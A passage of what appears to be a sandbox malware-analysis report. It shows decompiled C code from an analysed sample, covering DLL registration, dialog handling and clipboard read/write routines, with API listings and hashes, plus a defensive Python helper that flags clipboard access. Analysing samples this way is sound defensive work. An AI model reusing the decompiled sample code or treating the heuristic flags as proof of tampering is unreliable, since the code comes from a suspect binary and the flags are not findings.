    				memcpy(_t237 + _t174 + _t174, _t237, memcpy(_t245, _t237, _t174 << 2) & 0x00000003);
    				_a8 = E004181B0(_t245, 0x23,  &_v28);
    				_t238 = E004181B0(0, 0x23,  &_v28);
    				_t100 = E004181B0(0, 0x23,  &_v28);
    				_t249 = _t245 + 0x3c;
    				_t231 = _t100;
    				if(_t238 == 0) {
    					L5:
    					_t180 = _v24;
    					_t210 =  *((intOrPtr*)(_t180 + 0xd8));
    					_t101 = _t180 + 0xd8;
    					_t181 =  *((intOrPtr*)(_t210 - 8));
    					if( *((intOrPtr*)(_t210 - 8)) == 0) {
    						L7:
    						_push(0x4acca8);
    						_push(_v24 + 0xd0);
    						_push( &_v20);
    						_t102 = E0048350B(_v24 + 0xd0);
    						_push(_t165);
    						_push(_t102);
    						_v8 = 0;
    						_push( &_a8);
    						_t239 = LoadLibraryA( *(E0048350B(_v24 + 0xd0)));
    						E004832C2( &_a8);
    						_v8 = 0xffffffff;
    						E004832C2( &_v20);
    						if(_t239 == 0) {
    							goto L31;
    						}
    						L8:
    						_t110 = "DllRegisterServer";
    						if(_a12 == 0) {
    							_t110 = "DllUnregisterServer";
    						}
    						_t111 = GetProcAddress(_t239, _t110);
    						if(_t111 != 0) {
    							 *_t111();
    							FreeLibrary(_t239);
    							L13:
    							if(_a12 != 0) {
    								E00482580(_v24 + 0xdc,  *((intOrPtr*)(_v24 + 0xe4)), _a4);
    								E00482580(_v24 + 0xf0,  *((intOrPtr*)(_v24 + 0xf8)), _t165);
    							}
    							_t87 = 1;
    							goto L32;
    						} else {
    							FreeLibrary(_t239);
    							goto L31;
    						}
    					}
    					_push(_t165);
    					_push(_t101);
    					_push( &_a8);
    					_t239 = LoadLibraryA( *(E0048350B(_t181)));
    					E004832C2( &_a8);
    					if(_t239 != 0) {
    						goto L8;
    					}
    					goto L7;
    				}
    				_t125 =  *_t238;
    				if(_t125 == 0 || _t125 == 0x7b) {
    					goto L5;
    				} else {
    					if(_a12 == 0) {
    						_t166 = E004709B8( &_v28, _t238);
    						_t128 = E00471D40( &_v28, _t238, 0x2e);
    						_t250 = _t249 + 0xc;
    						if(_t128 == 0) {
    							_t241 = 0;
    						} else {
    							_t137 = E004709B8( &_v28, _t128 + 1);
    							_t250 = _t250 + 4;
    							_t241 = _t137;
    						}
    						E0040B5D0( &_v92);
    						_t190 = _a8;
    						_push( &_v52);
    						_push( &_v92);
    						_v8 = 5;
    						_push(E004204F0(_a8));
    						if( *0x4926e0() >= 0) {
    							 *0x4923b8( &_v52, _t166, _t241, E004709B8(_t190, _t231), 1);
    						}
    						_v8 = 0xffffffff;
    						_v92 = 0x495e50;
    						E0040B7D0( &_v92);
    						_t87 = 1;
    						goto L32;
    					}
    					_t192 =  *0x4b8924; // 0x4b8938
    					_a8 = _t192;
    					_v8 = 1;
    					_v20 = 0;
    					E0040B5D0( &_v72);
    					_t233 =  *0x4923b0;
    					_v8 = 2;
    					_t242 = 0;
    					do {
    						if(_t242 != 0) {
    							_push(_t165);
    							if(_t242 != 1) {
    								E004833FF( &_a8);
    							} else {
    								_push(_v24 + 0xd0);
    								_push( &_v36);
    								_t156 = E0048350B( &_v36);
    								_v8 = 4;
    								E004833AF( &_a8, _t243, _t156);
    								_v8 = 2;
    								E004832C2( &_v36);
    							}
    							L24:
    							_push( &_v20);
    							_push( &_v72);
    							_t141 = E004204F0(_a8);
    							_t249 = _t249 + 8;
    							_push(_t141);
    							if( *_t233() >= 0) {
    								break;
    							}
    							_v20 = 0;
    							goto L26;
    						}
    						_t218 = _v24;
    						_t205 =  *((intOrPtr*)(_t218 + 0xd8));
    						_t159 = _t218 + 0xd8;
    						if( *((intOrPtr*)( *((intOrPtr*)(_t218 + 0xd8)) - 8)) == 0) {
    							goto L26;
    						}
    						_push(_t165);
    						_push(_t159);
    						_push( &_v32);
    						_t160 = E0048350B(_t205);
    						_v8 = 3;
    						E004833AF( &_a8, _t243, _t160);
    						_v8 = 2;
    						E004832C2( &_v32);
    						goto L24;
    						L26:
    						_t242 = _t242 + 1;
    					} while (_t242 < 3);
    					if(_v20 == 0) {
    						L30:
    						_v8 = 1;
    						_v72 = 0x495e50;
    						E0040B7D0( &_v72);
    						_v8 = 0xffffffff;
    						E004832C2( &_a8);
    						goto L31;
    					}
    					_t148 =  *0x4923b4(_v20, E004204F0(_a8),  &_v72, 0);
    					_t149 = _v20;
    					if(_t148 >= 0) {
    						 *((intOrPtr*)( *_t149 + 8))(_t149);
    						_v8 = 1;
    						_v72 = 0x495e50;
    						E0040B7D0( &_v72);
    						_v8 = 0xffffffff;
    						E004832C2( &_a8);
    						goto L13;
    					}
    					 *((intOrPtr*)( *_t149 + 8))(_t149);
    					goto L30;
    				}
    			}

    0x004181f3
    0x004181f5
    0x00418200
    0x00418201
    0x00418208
    0x00418217
    0x0041821a
    0x004184d7
    0x004184d7
    0x004184d9
    0x004184df
    0x004184ec
    0x004184ec
    0x00418220
    0x00418226
    0x00000000
    0x00000000
    0x00418236
    0x0041823a
    0x00418242
    0x00418250
    0x00418252
    0x00418258
    0x0041825c
    0x00418266
    0x00418277
    0x00418284
    0x0041828e
    0x00418293
    0x00418296
    0x0041829a
    0x004182aa
    0x004182aa
    0x004182b3
    0x004182b9
    0x004182bf
    0x004182c4
    0x004182e4
    0x004182e7
    0x004182f5
    0x004182f6
    0x004182f7
    0x004182fc
    0x004182fd
    0x00418301
    0x00418308
    0x00418316
    0x00418318
    0x00418320
    0x00418327
    0x0041832e
    0x00000000
    0x00000000
    0x00418334
    0x00418339
    0x0041833e
    0x00418340
    0x00418340
    0x00418347
    0x0041834f
    0x0041835d
    0x00418360
    0x00418366
    0x0041836b
    0x00418381
    0x00418394
    0x00418394
    0x00418399
    0x00000000
    0x00418351
    0x00418352
    0x00000000
    0x00418352
    0x0041834f
    0x004182c6
    0x004182c7
    0x004182cb
    0x004182d9
    0x004182db
    0x004182e2
    0x00000000
    0x00000000
    0x00000000
    0x004182e2
    0x0041829c
    0x004182a0
    0x00000000
    0x004183a3
    0x004183a8
    0x00418525
    0x00418527
    0x0041852c
    0x00418531
    0x00418541
    0x00418533
    0x00418535
    0x0041853a
    0x0041853d
    0x0041853d
    0x00418546
    0x0041854b
    0x00418554
    0x00418555
    0x00418557
    0x00418566
    0x0041856f
    0x00418583
    0x00418583
    0x0041858c
    0x00418593
    0x0041859a
    0x0041859f
    0x00000000
    0x0041859f
    0x004183ae
    0x004183b4
    0x004183ba
    0x004183c1
    0x004183c8
    0x004183cd
    0x004183d3
    0x004183d7
    0x004183d9
    0x004183db
    0x00418420
    0x00418421
    0x00418453
    0x00418423
    0x0041842e
    0x0041842f
    0x00418430
    0x00418439
    0x0041843d
    0x00418445
    0x00418449
    0x00418449
    0x00418458
    0x00418461
    0x00418462
    0x00418464
    0x00418469
    0x0041846c
    0x00418471
    0x00000000
    0x00000000
    0x00418473
    0x00000000
    0x00418473
    0x004183dd
    0x004183e0
    0x004183e6
    0x004183f1
    0x00000000
    0x00000000
    0x004183f7
    0x004183fb
    0x004183fc
    0x004183fd
    0x00418406
    0x0041840a
    0x00418412
    0x00418416
    0x00000000
    0x0041847a
    0x0041847a
    0x0041847b
    0x00418489
    0x004184b5
    0x004184b8
    0x004184bc
    0x004184c3
    0x004184cb
    0x004184d2
    0x00000000
    0x004184d2
    0x004184a2
    0x004184aa
    0x004184ad
    0x004184f2
    0x004184f8
    0x004184fc
    0x00418503
    0x0041850b
    0x00418512
    0x00000000
    0x00418512
    0x004184b2
    0x00000000
    0x004184b2

    APIs
    • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,^I,?), ref: 004182D4
    • LoadLibraryA.KERNEL32(?,?,00000000,?,?,?,004ACCA8,?,?,?,?,?,?,00000000,^I,?), ref: 00418311
    • GetProcAddress.KERNEL32(00000000,DllRegisterServer), ref: 00418347
    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,00000000,^I,?), ref: 00418352
    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,00000000,^I,?), ref: 00418360
    • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 0041846D
    • RegisterTypeLib.OLEAUT32(00000000,00000000), ref: 004184A2
    • 748D7540.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,^I,?), ref: 00418567
    • UnRegisterTypeLib.OLEAUT32(?,00000000,00000000,00000000,00000001), ref: 00418583
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Library$LoadType$FreeRegister$AddressD7540Proc
    • String ID: DllRegisterServer$DllUnregisterServer$^I
    • API String ID: 2717949743-2090745826
    • Opcode ID: 9058cb554e69bf5b41b2bf5bb7e84ca09058ef1cbdd2014496bf7d8543e51d82
    • Instruction ID: 304864cbbfaec3157424182ccc49b206ecfd5ba89950229d39b72da526fc2fc0
    • Opcode Fuzzy Hash: 9058cb554e69bf5b41b2bf5bb7e84ca09058ef1cbdd2014496bf7d8543e51d82
    • Instruction Fuzzy Hash: EDB1C271900209ABDF10EFA4C845BEF77B8EF54718F14852EF815A7281DF789A45CBA8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E00484376(intOrPtr* __ecx) {
    				void* __esi;
    				signed int _t40;
    				struct HWND__* _t45;
    				signed int _t49;
    				signed char _t54;
    				struct HWND__* _t56;
    				struct HINSTANCE__* _t61;
    				void* _t63;
    				void* _t74;
    				intOrPtr* _t78;
    				void* _t80;
    				void* _t82;
    
    				E00473304(E00490C80, _t80);
    				_t78 = __ecx;
    				 *((intOrPtr*)(_t80 - 0x10)) = _t82 - 0x18;
    				 *((intOrPtr*)(_t80 - 0x1c)) = __ecx;
    				_t74 =  *(__ecx + 0x44);
    				 *(_t80 - 0x18) =  *(__ecx + 0x48);
    				_t40 = E0048C6BF();
    				_t61 =  *(_t40 + 0xc);
    				if( *(_t78 + 0x40) != 0) {
    					_t61 =  *(E0048C6BF() + 0xc);
    					_t40 = LoadResource(_t61, FindResourceA(_t61,  *(_t78 + 0x40), 5));
    					_t74 = _t40;
    				}
    				if(_t74 != 0) {
    					_t40 = LockResource(_t74);
    					 *(_t80 - 0x18) = _t40;
    				}
    				if( *(_t80 - 0x18) != 0) {
    					 *(_t80 - 0x14) = E004842FA(_t78);
    					E0048519E();
    					__eflags =  *(_t80 - 0x14);
    					 *(_t80 - 0x20) = 0;
    					if( *(_t80 - 0x14) != 0) {
    						_t56 = IsWindowEnabled( *(_t80 - 0x14));
    						__eflags = _t56;
    						if(_t56 != 0) {
    							EnableWindow( *(_t80 - 0x14), 0);
    							 *(_t80 - 0x20) = 1;
    						}
    					}
    					_push(_t78);
    					 *(_t80 - 4) = 0;
    					E00485152();
    					_t45 = E00484092(_t78,  *(_t80 - 0x18), E00484C84(_t80,  *(_t80 - 0x14)), _t61);
    					__eflags = _t45;
    					if(_t45 != 0) {
    						__eflags =  *(_t78 + 0x24) & 0x00000010;
    						if(( *(_t78 + 0x24) & 0x00000010) != 0) {
    							_t63 = 4;
    							_t54 = E004874EA(_t78);
    							__eflags = _t54 & 0x00000001;
    							if((_t54 & 0x00000001) != 0) {
    								_t63 = 5;
    							}
    							_push(_t63);
    							E00486E8F(_t78);
    						}
    						__eflags =  *(_t78 + 0x1c);
    						if( *(_t78 + 0x1c) != 0) {
    							E004875D2(_t78, 0, 0, 0, 0, 0, 0x97);
    						}
    					}
    					 *(_t80 - 4) =  *(_t80 - 4) | 0xffffffff;
    					__eflags =  *(_t80 - 0x20);
    					if( *(_t80 - 0x20) != 0) {
    						EnableWindow( *(_t80 - 0x14), 1);
    					}
    					__eflags =  *(_t80 - 0x14);
    					if(__eflags != 0) {
    						__eflags = GetActiveWindow() -  *(_t78 + 0x1c);
    						if(__eflags == 0) {
    							SetActiveWindow( *(_t80 - 0x14));
    						}
    					}
    					 *((intOrPtr*)( *_t78 + 0x58))();
    					E00484334(_t78, _t78, __eflags);
    					_t49 =  *(_t78 + 0x2c);
    				} else {
    					_t49 = _t40 | 0xffffffff;
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t80 - 0xc));
    				return _t49;
    			}

    0x0048437b
    0x00484385
    0x00484388
    0x0048438b
    0x00484391
    0x00484394
    0x00484397
    0x004843a0
    0x004843a3
    0x004843aa
    0x004843bb
    0x004843c1
    0x004843c1
    0x004843c5
    0x004843c8
    0x004843ce
    0x004843ce
    0x004843d5
    0x004843e6
    0x004843e9
    0x004843f0
    0x004843f3
    0x004843f6
    0x004843fb
    0x00484401
    0x00484403
    0x00484409
    0x0048440f
    0x0048440f
    0x00484403
    0x00484416
    0x00484417
    0x0048441a
    0x0048442e
    0x00484433
    0x00484435
    0x00484437
    0x0048443b
    0x00484441
    0x00484442
    0x00484447
    0x0048444a
    0x0048444e
    0x0048444e
    0x0048444f
    0x00484452
    0x00484452
    0x00484457
    0x0048445a
    0x00484468
    0x00484468
    0x0048445a
    0x00484489
    0x0048448d
    0x00484490
    0x00484497
    0x00484497
    0x0048449d
    0x004844a0
    0x004844a8
    0x004844ab
    0x004844b0
    0x004844b0
    0x004844ab
    0x004844ba
    0x004844bf
    0x004844c4
    0x004843d7
    0x004843d7
    0x004843d7
    0x004844cc
    0x004844d5

    APIs
    • __EH_prolog.LIBCMT ref: 0048437B
    • FindResourceA.KERNEL32(?,00000000,00000005), ref: 004843B3
    • LoadResource.KERNEL32(?,00000000,?,?,?,00000000), ref: 004843BB
      • Part of subcall function 0048519E: UnhookWindowsHookEx.USER32(?), ref: 004851C3
    • LockResource.KERNEL32(?,?,00000000,?,?,?,00000000), ref: 004843C8
    • IsWindowEnabled.USER32(?), ref: 004843FB
    • EnableWindow.USER32(?,00000000), ref: 00484409
    • EnableWindow.USER32(?,00000001), ref: 00484497
    • GetActiveWindow.USER32 ref: 004844A2
    • SetActiveWindow.USER32(?,?,?,00000000,?,?,?,00000000), ref: 004844B0
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Window$Resource$ActiveEnable$EnabledFindH_prologHookLoadLockUnhookWindows
    • String ID:
    • API String ID: 401145483-0
    • Opcode ID: d66c5ac76da529ffea1a0be7e6add78610ed2b49e08e879faf088dc1803e0abc
    • Instruction ID: dd0ef95a1e9da3bc0a7dea387f597797d51191665c4855fc232cff2d401fa857
    • Opcode Fuzzy Hash: d66c5ac76da529ffea1a0be7e6add78610ed2b49e08e879faf088dc1803e0abc
    • Instruction Fuzzy Hash: 0D41B430A006169FCF21BF65CD49B7FBBB5AF84B15F104A2FE501A2291CB795D00DB59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E00432F60(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
    				struct HWND__* _v4;
    				intOrPtr _v8;
    				intOrPtr _v12;
    				signed int _v20;
    				signed int _v28;
    				char _v32;
    				char _v36;
    				void* __ebp;
    				void* _t18;
    				long _t24;
    				void* _t25;
    				signed int _t32;
    				int _t33;
    				void* _t39;
    				signed int _t48;
    				signed int _t49;
    				void* _t70;
    				void* _t71;
    				signed int _t73;
    				intOrPtr _t74;
    				void* _t75;
    
    				_push(0xffffffff);
    				_push(E0048FB48);
    				_push( *[fs:0x0]);
    				 *[fs:0x0] = _t74;
    				_t75 = _t74 - 0x14;
    				_push(_t71);
    				_t18 = E0042D860(__ecx);
    				_t78 = _t18;
    				if(_t18 == 0) {
    					L8:
    					 *[fs:0x0] = _v12;
    					return _t18;
    				} else {
    					E0040B5D0( &_v32);
    					_push(_a16);
    					_v4 = 0;
    					if(E0042AF70(E0042D860(__ecx), _t71, _t78,  &_v32, _a4, _a8, _a12) != 0) {
    						_t24 = _v20;
    						_t73 = _t24;
    						if(_t24 != 0) {
    							_t25 = GlobalAlloc(0x42, _t24);
    							_t39 = _t25;
    							if(_t39 != 0) {
    								asm("sbb esi, esi");
    								_t70 =  ~_v20 & _v28;
    								GlobalFix(_t39);
    								_t48 = _t73;
    								_t49 = _t48 >> 2;
    								memcpy(_t25, _t70, _t49 << 2);
    								memcpy(_t70 + _t49 + _t49, _t70, _t48 & 0x00000003);
    								_t75 = _t75 + 0x18;
    								E0040B7D0( &_v36);
    								GlobalUnWire(_t39);
    								if(OpenClipboard(0) != 0) {
    									EmptyClipboard();
    									_t32 =  *0x4c9de0; // 0xc1e0
    									_t33 = _t32 & 0x0000ffff;
    									__eflags = _t33;
    									SetClipboardData(_t33, _t39);
    									CloseClipboard();
    								} else {
    									GlobalFree(_t39);
    								}
    							}
    						}
    					}
    					_v8 = 0xffffffff;
    					_v36 = 0x496e20;
    					_t18 = E0040B7D0( &_v36);
    					goto L8;
    				}
    			}

    0x00432f66
    0x00432f68
    0x00432f6d
    0x00432f6e
    0x00432f75
    0x00432f79
    0x00432f7d
    0x00432f82
    0x00432f84
    0x00433068
    0x0043306f
    0x00433079
    0x00432f8a
    0x00432f8e
    0x00432f9f
    0x00432fae
    0x00432fc4
    0x00432fca
    0x00432fd0
    0x00432fd2
    0x00432fd7
    0x00432fdd
    0x00432fe1
    0x00432fef
    0x00432ff1
    0x00432ff3
    0x00432ff9
    0x00432fff
    0x00433002
    0x00433009
    0x00433009
    0x0043300f
    0x00433015
    0x00433026
    0x00433031
    0x00433037
    0x0043303d
    0x0043303d
    0x00433043
    0x00433049
    0x00433028
    0x00433029
    0x00433029
    0x00433026
    0x00432fe1
    0x00432fd2
    0x00433053
    0x0043305b
    0x00433063
    0x00000000
    0x00433063

    APIs
    • GlobalAlloc.KERNEL32(00000042,?), ref: 00432FD7
    • GlobalFix.KERNEL32(00000000), ref: 00432FF3
    • GlobalUnWire.KERNEL32(00000000), ref: 00433015
    • OpenClipboard.USER32(00000000), ref: 0043301D
    • GlobalFree.KERNEL32(00000000), ref: 00433029
    • EmptyClipboard.USER32 ref: 00433031
    • SetClipboardData.USER32(0000C1E0,00000000), ref: 00433043
    • CloseClipboard.USER32 ref: 00433049
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: ClipboardGlobal$AllocCloseDataEmptyFreeOpenWire
    • String ID:
    • API String ID: 3835215632-0
    • Opcode ID: bae163786040f720fb4e92fd324b7ea6c7f2db4e40cace48cd8024b9c33a86eb
    • Instruction ID: 1a8c52708e0c2479fc18366f5a0785fc10e7992fe0e211884d4772ef256bea1a
    • Opcode Fuzzy Hash: bae163786040f720fb4e92fd324b7ea6c7f2db4e40cace48cd8024b9c33a86eb
    • Instruction Fuzzy Hash: 5031BF71204201AFC718EF65DD95A2BB7A8EB98721F104A3EF85293281DB78D904CB69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E004330C0(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
    				char _v4;
    				char _v8;
    				char _v12;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				void* __ebp;
    				signed int _t16;
    				long _t20;
    				void* _t31;
    				intOrPtr* _t48;
    				void* _t49;
    				intOrPtr _t50;
    
    				_t48 = __ecx;
    				_t14 = E0042D860(__ecx);
    				if(_t14 == 0) {
    					L10:
    					return _t14;
    				} else {
    					_t14 = E0042AE20(E0042D860(__ecx));
    					if(_t14 != 0) {
    						goto L10;
    					} else {
    						_t14 = OpenClipboard(_t14);
    						if(_t14 == 0) {
    							goto L10;
    						} else {
    							_t16 =  *0x4c9de0; // 0xc1e0
    							_t49 = GetClipboardData(_t16 & 0x0000ffff);
    							if(_t49 != 0) {
    								_t50 = _a8;
    								_push(1);
    								_push( &_v12);
    								_push( &_v8);
    								_push( &_v4);
    								_t20 = GlobalSize(_t49);
    								GlobalFix(_t49);
    								_t31 = E0042B050(E0042D860(_t48), _t50, _t20, _t20, _a4, _t50,  *(_t48 + 0x44) >> 0x00000004 & 0x00000001);
    								GlobalUnWire(_t49);
    								CloseClipboard();
    								_t14 = 1;
    								if(_v24 == 1 && _t31 == 1) {
    									if(_v28 == 1) {
    										 *((intOrPtr*)( *_t48 + 0xcc))();
    									}
    									return  *((intOrPtr*)( *_t48 + 0xc0))(_v12, _t50, _v20, _v24);
    								}
    								goto L10;
    							} else {
    								return CloseClipboard();
    							}
    						}
    					}
    				}
    			}

    0x004330c7
    0x004330c9
    0x004330d0
    0x004331b6
    0x004331b6
    0x004330d6
    0x004330df
    0x004330e6
    0x00000000
    0x004330ec
    0x004330ed
    0x004330f5
    0x00000000
    0x004330fb
    0x004330fb
    0x0043310c
    0x00433110
    0x00433126
    0x0043312a
    0x0043312c
    0x0043313b
    0x00433143
    0x00433148
    0x00433150
    0x00433166
    0x00433168
    0x0043316e
    0x00433178
    0x0043317f
    0x00433189
    0x0043318f
    0x0043318f
    0x00000000
    0x004331a9
    0x00000000
    0x00433112
    0x0043311f
    0x0043311f
    0x00433110
    0x004330f5
    0x004330e6

    APIs
    • OpenClipboard.USER32(00000000), ref: 004330ED
    • GetClipboardData.USER32(0000C1E0), ref: 00433106
    • CloseClipboard.USER32 ref: 00433112
    • GlobalSize.KERNEL32(00000000), ref: 00433148
    • GlobalFix.KERNEL32(00000000), ref: 00433150
    • GlobalUnWire.KERNEL32(00000000), ref: 00433168
    • CloseClipboard.USER32 ref: 0043316E
    Similarity
    • API ID: Clipboard$Global$Close$DataOpenSizeWire
    • String ID:
    • API String ID: 1435569668-0
    • Opcode ID: 101abafd1394978a8073d736d75ca4bbbf8514313104214a0dcd7160ba9c0b7b
    • Instruction ID: 8683634fd5cbad426c66645dc44af58df815bc4f342852bad38c7aa0a7d2edd8
    • Opcode Fuzzy Hash: 101abafd1394978a8073d736d75ca4bbbf8514313104214a0dcd7160ba9c0b7b
    • Instruction Fuzzy Hash: BB219631700201ABDA14EB65EC54E7F7799EF98356F04063EF905D3240EB68DD05C7A9
    Uniqueness

    Uniqueness Score: -1.00%
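The two clipboard routines above show both directions of clipboard access in this sample. The first one allocates a global block, empties the clipboard and calls SetClipboardData; E004330C0 opens the clipboard, fetches the handle with GetClipboardData, sizes and pins it with GlobalSize/GlobalFix and passes the buffer to an internal routine before GlobalUnWire/CloseClipboard. In both, the format argument (0xC1E0 in this dump) is loaded from the global at 0x4c9de0 rather than hard-coded, and values in the range 0xC000 to 0xFFFF are registered clipboard formats, so this is not a plain CF_TEXT read. The Python below is an added triage helper, not code from the report or from the sample: it parses API lines written in the format this report uses (the sample listing is copied from the entries above; the first function's label is a placeholder because its name is not in this excerpt) and flags, per function, whether clipboard data is read or written and whether the format is a registered one.

```python
import re
from collections import OrderedDict

# Matches the per-function API lines of a Joe Sandbox report, e.g.
#   • GetClipboardData.USER32(0000C1E0), ref: 00433106
#   • EmptyClipboard.USER32 ref: 00433031
API_LINE = re.compile(
    r"•\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

CLIPBOARD_READ_APIS = {"GetClipboardData"}
CLIPBOARD_WRITE_APIS = {"SetClipboardData"}

# Registered (application-defined) clipboard formats live in 0xC000..0xFFFF;
# the predefined ones are small integers (CF_TEXT is 1, CF_UNICODETEXT is 13).
REGISTERED_FORMAT_MIN, REGISTERED_FORMAT_MAX = 0xC000, 0xFFFF


def parse_format(args):
    """First argument of Get/SetClipboardData as an int, or None when the report
    could not resolve it ('?')."""
    if not args:
        return None
    first = args.split(",")[0].strip()
    if first == "?":
        return None
    return int(first, 16)


def is_registered_format(fmt):
    return REGISTERED_FORMAT_MIN <= fmt <= REGISTERED_FORMAT_MAX


def triage_clipboard_use(api_listing):
    """Group API lines under the function label that precedes them and record
    whether each function reads or writes clipboard data, and with which format."""
    functions = OrderedDict()
    current = None
    for raw in api_listing.splitlines():
        line = raw.strip()
        if not line:
            continue
        if not line.startswith("•"):            # a function label line
            current = line
            functions[current] = {"reads": False, "writes": False,
                                  "formats": [], "registered_format": False,
                                  "apis": []}
            continue
        m = API_LINE.search(line)
        if m is None or current is None:
            continue
        api = m.group("api")
        rec = functions[current]
        rec["apis"].append(api)
        if api in CLIPBOARD_READ_APIS or api in CLIPBOARD_WRITE_APIS:
            rec["reads"] |= api in CLIPBOARD_READ_APIS
            rec["writes"] |= api in CLIPBOARD_WRITE_APIS
            fmt = parse_format(m.group("args"))
            if fmt is not None:
                rec["formats"].append(fmt)
                rec["registered_format"] |= is_registered_format(fmt)
    return functions


def summarize(functions):
    """One line per function that touches clipboard data."""
    lines = []
    for name, rec in functions.items():
        if not (rec["reads"] or rec["writes"]):
            continue
        verbs = [v for v, on in (("reads", rec["reads"]), ("writes", rec["writes"])) if on]
        fmts = ", ".join(f"0x{f:04X}" for f in rec["formats"]) or "unknown format"
        kind = "registered format" if rec["registered_format"] else "standard format"
        lines.append(f"{name}: {'/'.join(verbs)} clipboard ({fmts}; {kind})")
    return lines


# Constructed sample in the report's own format. The first label is a placeholder
# because that function's name is not in this excerpt (its first address is 0x432F66).
SAMPLE_API_LINES = """\
FUNC_00432F66
• GlobalAlloc.KERNEL32(00000042,?), ref: 00432FD7
• OpenClipboard.USER32(00000000), ref: 0043301D
• EmptyClipboard.USER32 ref: 00433031
• SetClipboardData.USER32(0000C1E0,00000000), ref: 00433043
• CloseClipboard.USER32 ref: 00433049
E004330C0
• OpenClipboard.USER32(00000000), ref: 004330ED
• GetClipboardData.USER32(0000C1E0), ref: 00433106
• GlobalSize.KERNEL32(00000000), ref: 00433148
• CloseClipboard.USER32 ref: 0043316E
E0047ED6E
• GetLocaleInfoA.KERNEL32(?,?,?,?), ref: 0047EDAF
"""

if __name__ == "__main__":
    for line in summarize(triage_clipboard_use(SAMPLE_API_LINES)):
        print(line)
```

The script only reports what the static API listing shows; a read/write pair on the same format is a reason to look at the routine that sits between GetClipboardData and SetClipboardData, not proof of clipboard tampering on its own. Because the format value is read from a global at run time, confirm it against the string passed to RegisterClipboardFormat elsewhere in the dump before treating 0xC1E0 as meaningful.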

    C-Code - Quality: 97%
    			E0047ED6E(void* __edx, int _a4, int _a8, char* _a12, int _a16) {
    				signed int _t22;
